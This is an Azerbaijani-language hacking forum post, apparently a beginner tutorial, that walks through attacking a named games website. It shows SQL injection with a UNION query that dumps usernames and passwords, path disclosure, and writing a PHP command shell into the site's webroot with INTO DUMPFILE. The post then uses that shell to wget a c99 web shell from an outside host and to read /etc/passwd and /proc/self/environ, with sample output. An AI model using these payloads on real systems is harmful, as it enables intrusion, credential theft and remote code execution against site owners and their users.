asd

1. Ondansa Shell upload elə əlin dəymişkən. İlk ömcə bizə Path lazım olacaq. Yani hara upload elədiyimizi Bilək deyə.
2. Demeli
3. SQLi = http://www.gamesinaflash.com/play.php?id=37%27
4. Path Disclosure : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamesinaflash/public_html/play.php on line 14
5. Cox vaxti bunu tapmaq cetin olur. Meselen TheJust senin verdiyinde bele 1 sey varki Path yazilmayib amma biz onu tapmaq ucun [] istifade edeceyik. FULL Path Disclosure her 1 sistemde ise yaramir. Senin verdiyinde bele idi :
6. www.gamesinaflash.com/play.php?id=-37 UNION SELECT 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
7. Biz Path Disclosure-den istifade elesek o zaman $GET['id'] bunun yanina [] cutleyirik
8. www.gamesinaflash.com/play.php?id[]=-37 UNION SELECT 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
9. Gorduyunuz kimi yene ortaya cixdi
10. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamesinaflash/public_html/play.php on line 14
11. Burda bize lazim olan
12. [code]/home/gamesinaflash/public_html/play.php[/code]
13. Haminiz bilirsinizki /www/ ve ya /pubic_html/ esas folderlerdendi.
14. Yani ora ne atsan o zaman sitede gorsenecek. meselen /home/gamesinaflash/public_html/asd.php yazsan site.com/asd.php kimi gelecek.Bu hakda cox yazi yazmaq olar. Indi movzuya qayidaq. Esas lazim olan hisse brua idi :
15. [code]/home/gamesinaflash/public_html/[/code]
16. Artiq hansi papkalar var bilirik. indi ise <? echo system $_GET['cmd'] ?> istifade edeceyik. Demeli. Bize bu Full Path Disclosure daha dogurus Path lazim idi tapdiq (/home/gamesinaflash/public_html/) indide uplayaq.
17. [code]
18. www.gamesinaflash.com/play.php?id=-37 UNION SELECT 1,2,3,'<? echo system $_GET['cmd']; ?>,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into dumpfile '/home/gamesinaflash/public_html/shellinadi.php'
19. [/code]
20. Burda "shellinadi.php" adinda 1 fayl yaranir. Ve SYSTEM kimi istifade edilir. sonrada shellinadi.php?cmd=ls ile emrleri yerine getiririk sonrada [code]shellinadi.php?cmd=wget http://c99.gen.tr/c99.txt -O shell.php[/code]
21. Bu zamanda shell.php adinda 1 file yaranir ve biz onu Include edirik sayta. bu SQL zamani /etc/passwd cekmek olur meselen
22. [code]root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin[/code]
23. Sonra ne bilim PSE [code]www.website.com/shellinadi.php?cmd=../../../../../proc/self/environ[/code]
24. O zaman qarsimiza bele 1 sey cixacaq
25. [code]DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
26.  
27. Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80[/code]
28. Burda bizim yaratdigimiz shellinad.php artiq 1 system fayli terminal kimi source gosterir.dediyim kimi 1 nov Inclusion. daha cox Local File Inclusion. Bu sayt uzerinde live gostermerk isterdim amma gerek bypasslansin onada vaxtim yoxdu tesekkurler =) Yeniler faydalansin